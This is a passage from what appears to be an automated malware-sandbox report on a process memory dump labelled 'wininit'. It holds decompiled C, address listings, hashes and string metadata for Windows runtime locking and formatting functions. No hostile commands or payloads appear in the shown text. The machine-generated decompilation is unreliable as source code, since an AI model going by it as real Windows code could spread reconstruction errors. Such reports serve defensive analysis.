														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0251F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02563915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0251F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02563915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02545329(_t110, _t138);
																_t69 = E025453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                0x0256055a
                                                0x0256055d
                                                0x02560563
                                                0x02560566
                                                0x025605d8
                                                0x025605e2
                                                0x025605e5
                                                0x00000000
                                                0x025605e7
                                                0x025605e7
                                                0x025605ea
                                                0x025605f3
                                                0x025605f3
                                                0x02560568
                                                0x02560568
                                                0x02560568
                                                0x02560569
                                                0x02560569
                                                0x02560569
                                                0x0256056b
                                                0x00000000
                                                0x00000000
                                                0x0258217f
                                                0x02582183
                                                0x0258225b
                                                0x0258225f
                                                0x02582189
                                                0x0258218c
                                                0x0258218f
                                                0x02582194
                                                0x02582199
                                                0x0258219d
                                                0x025821a0
                                                0x025821a2
                                                0x025821ce
                                                0x025821ce
                                                0x025821ce
                                                0x025821d0
                                                0x025821d6
                                                0x025821de
                                                0x025821e2
                                                0x025821e8
                                                0x025821e9
                                                0x025821ec
                                                0x025821f1
                                                0x025821f6
                                                0x00000000
                                                0x00000000
                                                0x025821f8
                                                0x025821fb
                                                0x02582206
                                                0x0258220b
                                                0x0258220c
                                                0x02582217
                                                0x02582226
                                                0x0258222b
                                                0x0258222c
                                                0x0258222f
                                                0x02582232
                                                0x02582235
                                                0x02582235
                                                0x0258223a
                                                0x0258223f
                                                0x02582241
                                                0x02582243
                                                0x02582248
                                                0x02582248
                                                0x0258224d
                                                0x0258224f
                                                0x02582262
                                                0x02582263
                                                0x02582268
                                                0x02582269
                                                0x02582269
                                                0x02582269
                                                0x0258226d
                                                0x00000000
                                                0x00000000
                                                0x02582276
                                                0x02582279
                                                0x0258227e
                                                0x02582283
                                                0x02582287
                                                0x0258228a
                                                0x0258228d
                                                0x0258228f
                                                0x025822bc
                                                0x025822bc
                                                0x025822bc
                                                0x025822be
                                                0x025822c4
                                                0x025822cc
                                                0x025822d0
                                                0x025822d6
                                                0x025822d7
                                                0x025822da
                                                0x025822df
                                                0x025822e4
                                                0x00000000
                                                0x00000000
                                                0x025822e6
                                                0x025822e9
                                                0x025822f4
                                                0x025822f9
                                                0x025822fa
                                                0x02582305
                                                0x02582314
                                                0x02582319
                                                0x0258231a
                                                0x0258231d
                                                0x02582320
                                                0x02582323
                                                0x02582323
                                                0x02582328
                                                0x0258232d
                                                0x0258232f
                                                0x02582331
                                                0x02582336
                                                0x02582336
                                                0x0258233b
                                                0x0258233d
                                                0x02582350
                                                0x02582351
                                                0x02582356
                                                0x02582359
                                                0x02582359
                                                0x0258235b
                                                0x0258235d
                                                0x02545367
                                                0x0254536b
                                                0x02545372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02582363
                                                0x02582363
                                                0x02582369
                                                0x0258236a
                                                0x0258236c
                                                0x02582371
                                                0x02582373
                                                0x00000000
                                                0x02582379
                                                0x02582379
                                                0x0258237a
                                                0x0258237f
                                                0x0258237f
                                                0x02582385
                                                0x02582386
                                                0x02582389
                                                0x0258238e
                                                0x02582390
                                                0x02545378
                                                0x0254537c
                                                0x02582396
                                                0x02582396
                                                0x02582397
                                                0x0258239c
                                                0x025823a2
                                                0x025823a3
                                                0x025823a6
                                                0x025823ab
                                                0x025823ad
                                                0x00000000
                                                0x025823b3
                                                0x025823b3
                                                0x025823b4
                                                0x025823b9
                                                0x025823ba
                                                0x025823ba
                                                0x025823bc
                                                0x025823bf
                                                0x00000000
                                                0x00000000
                                                0x02579153
                                                0x02579158
                                                0x0257915a
                                                0x0257915e
                                                0x02579160
                                                0x00000000
                                                0x02579166
                                                0x02579166
                                                0x02579171
                                                0x02579176
                                                0x02579176
                                                0x00000000
                                                0x02579160
                                                0x025823c6
                                                0x025823ce
                                                0x025823d7
                                                0x025823d7
                                                0x025823ad
                                                0x02582390
                                                0x02582373
                                                0x0258233f
                                                0x0258233f
                                                0x00000000
                                                0x0258233f
                                                0x02582291
                                                0x02582291
                                                0x02582293
                                                0x02582295
                                                0x0258229a
                                                0x025822a1
                                                0x025822a3
                                                0x025822a7
                                                0x025822a9
                                                0x00000000
                                                0x00000000
                                                0x025822ab
                                                0x025822ad
                                                0x025822af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822af
                                                0x025822b1
                                                0x025822b4
                                                0x025822b4
                                                0x025822b6
                                                0x025453be
                                                0x025453be
                                                0x025453be
                                                0x025453c0
                                                0x00000000
                                                0x00000000
                                                0x025453cb
                                                0x025453ce
                                                0x025453d0
                                                0x025453d4
                                                0x025453d6
                                                0x00000000
                                                0x025453d8
                                                0x025453e3
                                                0x025453ea
                                                0x025453ea
                                                0x00000000
                                                0x025453d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822b6
                                                0x00000000
                                                0x0258228f
                                                0x02582349
                                                0x0258234d
                                                0x02582251
                                                0x02582251
                                                0x00000000
                                                0x02582251
                                                0x025821a4
                                                0x025821a4
                                                0x025821a6
                                                0x025821a8
                                                0x025821ac
                                                0x025821b6
                                                0x025821b8
                                                0x025821bc
                                                0x025821be
                                                0x00000000
                                                0x00000000
                                                0x025821c0
                                                0x025821c2
                                                0x025821c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025821c4
                                                0x025821c6
                                                0x025821c6
                                                0x025821c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025821c8
                                                0x025821a2
                                                0x00000000
                                                0x02582183
                                                0x0256057b
                                                0x0256057d
                                                0x02560581
                                                0x02560583
                                                0x02582178
                                                0x00000000
                                                0x02560589
                                                0x0256058f
                                                0x0256058f
                                                0x02560583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02582206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a39e3a36ae9f20320f6198f8b56f820aa8bbefd7f323b2437e1d6ee0f3238df8
                                                • Instruction ID: e59ebed5dac3772d70b50552cc3b2222d6300ec0237edfa0b95d685e19600b15
                                                • Opcode Fuzzy Hash: a39e3a36ae9f20320f6198f8b56f820aa8bbefd7f323b2437e1d6ee0f3238df8
                                                • Instruction Fuzzy Hash: B6515E717002526FEB14DE14CC85F663BAABFD4724F214259EC05EB2C4EA71EC418B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E025614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2602088; // 0x764b2ec1
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02557707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02557707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02557707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02522340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0252E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x025614c0
                                                0x025614cb
                                                0x025614d2
                                                0x025614d6
                                                0x025614da
                                                0x025614de
                                                0x025614e3
                                                0x0256157a
                                                0x0256157a
                                                0x025614f1
                                                0x025614f3
                                                0x0258ea0f
                                                0x00000000
                                                0x0258ea15
                                                0x00000000
                                                0x0258ea15
                                                0x025614f9
                                                0x025614f9
                                                0x025614fe
                                                0x02561504
                                                0x0258ea1a
                                                0x0258ea1f
                                                0x0258ea21
                                                0x0258ea22
                                                0x0258ea27
                                                0x0258ea2a
                                                0x0258ea2a
                                                0x02561515
                                                0x02561517
                                                0x0256156d
                                                0x02561572
                                                0x02561575
                                                0x02561575
                                                0x0256151e
                                                0x0258ea50
                                                0x0258ea55
                                                0x0258ea58
                                                0x0258ea58
                                                0x0256152e
                                                0x02561531
                                                0x02561533
                                                0x00000000
                                                0x02561535
                                                0x02561541
                                                0x02561549
                                                0x02561549
                                                0x02561533
                                                0x025614f3
                                                0x02561559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0258EA22
                                                  • Part of subcall function 025613CB: ___swprintf_l.LIBCMT ref: 0256146B
                                                  • Part of subcall function 025613CB: ___swprintf_l.LIBCMT ref: 02561490
                                                • ___swprintf_l.LIBCMT ref: 0256156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 31f3d72a2fe2bb157fa0a014b5c57852b2f3930d9e93764e48d1fdf981ff282e
                                                • Instruction ID: 674a35f4b27c95525874af86a7747ae7e2cfaaf2591dda7cfb5e9efbc73a1a10
                                                • Opcode Fuzzy Hash: 31f3d72a2fe2bb157fa0a014b5c57852b2f3930d9e93764e48d1fdf981ff282e
                                                • Instruction Fuzzy Hash: 1C21B6729006299BDB20DE54DC49AFEB7BCBB64704F448555EC4AD3240DB70EA588FD4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 45%
                                                			E025453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026001c0;
									_push(_t92);
									_push(0);
									_t37 = E0251F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02564FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02573F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02573F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E025A217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02573F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02563915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02545384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0251F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02563915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0251F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02563915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0251F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02563915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02545329(_t74, _t92);
													_push(1);
													_t48 = E025453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                0x025453ab
                                                0x025453ae
                                                0x025453b1
                                                0x025453b4
                                                0x025453b7
                                                0x025605b6
                                                0x025605c0
                                                0x025605c3
                                                0x00000000
                                                0x025605c9
                                                0x025605c9
                                                0x025605cc
                                                0x025605d5
                                                0x025605d5
                                                0x025453bd
                                                0x025453bd
                                                0x025453bd
                                                0x025453be
                                                0x025453be
                                                0x025453be
                                                0x025453c0
                                                0x00000000
                                                0x00000000
                                                0x02582269
                                                0x0258226d
                                                0x02582349
                                                0x0258234d
                                                0x02582273
                                                0x02582276
                                                0x02582279
                                                0x0258227e
                                                0x02582283
                                                0x02582287
                                                0x0258228a
                                                0x0258228d
                                                0x0258228f
                                                0x025822bc
                                                0x025822bc
                                                0x025822bc
                                                0x025822be
                                                0x025822c4
                                                0x025822cc
                                                0x025822d0
                                                0x025822d6
                                                0x025822d7
                                                0x025822da
                                                0x025822df
                                                0x025822e4
                                                0x00000000
                                                0x00000000
                                                0x025822e6
                                                0x025822e9
                                                0x025822f4
                                                0x025822f9
                                                0x025822fa
                                                0x02582305
                                                0x02582314
                                                0x02582319
                                                0x0258231a
                                                0x0258231d
                                                0x02582320
                                                0x02582323
                                                0x02582323
                                                0x02582328
                                                0x0258232d
                                                0x0258232f
                                                0x02582331
                                                0x02582336
                                                0x02582336
                                                0x0258233b
                                                0x0258233d
                                                0x02582350
                                                0x02582351
                                                0x02582356
                                                0x02582359
                                                0x02582359
                                                0x0258235b
                                                0x0258235d
                                                0x02545367
                                                0x0254536b
                                                0x02545372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02582363
                                                0x02582363
                                                0x02582369
                                                0x0258236a
                                                0x0258236c
                                                0x02582371
                                                0x02582373
                                                0x00000000
                                                0x02582379
                                                0x02582379
                                                0x0258237a
                                                0x0258237f
                                                0x0258237f
                                                0x02582385
                                                0x02582386
                                                0x02582389
                                                0x0258238e
                                                0x02582390
                                                0x02545378
                                                0x0254537c
                                                0x02582396
                                                0x02582396
                                                0x02582397
                                                0x0258239c
                                                0x025823a2
                                                0x025823a3
                                                0x025823a6
                                                0x025823ab
                                                0x025823ad
                                                0x00000000
                                                0x025823b3
                                                0x025823b3
                                                0x025823b4
                                                0x025823b9
                                                0x025823ba
                                                0x025823ba
                                                0x025823bc
                                                0x025823bf
                                                0x00000000
                                                0x00000000
                                                0x02579153
                                                0x02579158
                                                0x0257915a
                                                0x0257915e
                                                0x02579160
                                                0x00000000
                                                0x02579166
                                                0x02579166
                                                0x02579171
                                                0x02579176
                                                0x02579176
                                                0x00000000
                                                0x02579160
                                                0x025823c6
                                                0x025823cb
                                                0x025823ce
                                                0x025823d7
                                                0x025823d7
                                                0x025823ad
                                                0x02582390
                                                0x02582373
                                                0x0258233f
                                                0x0258233f
                                                0x00000000
                                                0x0258233f
                                                0x02582291
                                                0x02582291
                                                0x02582293
                                                0x02582295
                                                0x0258229a
                                                0x025822a1
                                                0x025822a3
                                                0x025822a7
                                                0x025822a9
                                                0x00000000
                                                0x00000000
                                                0x025822ab
                                                0x025822ad
                                                0x025822af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822af
                                                0x025822b1
                                                0x025822b4
                                                0x025822b4
                                                0x025822b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x025822b6
                                                0x0258228f
                                                0x00000000
                                                0x0258226d
                                                0x025453cb
                                                0x025453ce
                                                0x025453d0
                                                0x025453d4
                                                0x025453d6
                                                0x00000000
                                                0x025453d8
                                                0x025453e3
                                                0x025453ea
                                                0x025453ea
                                                0x025453d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025822F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025822FC
                                                • RTL: Resource at %p, xrefs: 0258230B
                                                • RTL: Re-Waiting, xrefs: 02582328
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 9c3a63064c9c7b950d97c3dbd498f762d5918c4f797895a42591b2bb8dc9bb21
                                                • Instruction ID: e503550f566db9d24a28ed48e06ca8ad77e9adede59fca2e336ce61110a8a699
                                                • Opcode Fuzzy Hash: 9c3a63064c9c7b950d97c3dbd498f762d5918c4f797895a42591b2bb8dc9bb21
                                                • Instruction Fuzzy Hash: 80512A716107066BEB14EF24DC84FA67799FF94728F104619FD09DB280FB61E8418F98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0254EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E0254EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0253DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x260793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E025216C0(_t39);
				} else {
					_t40 = E0251F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02563915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E025201A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x260793c; // 0x0
								_push(_t85);
								_t44 = E02521F28(_t71);
							} else {
								_t44 = E0251F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02563915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E025A2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0254EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02564FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02573F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
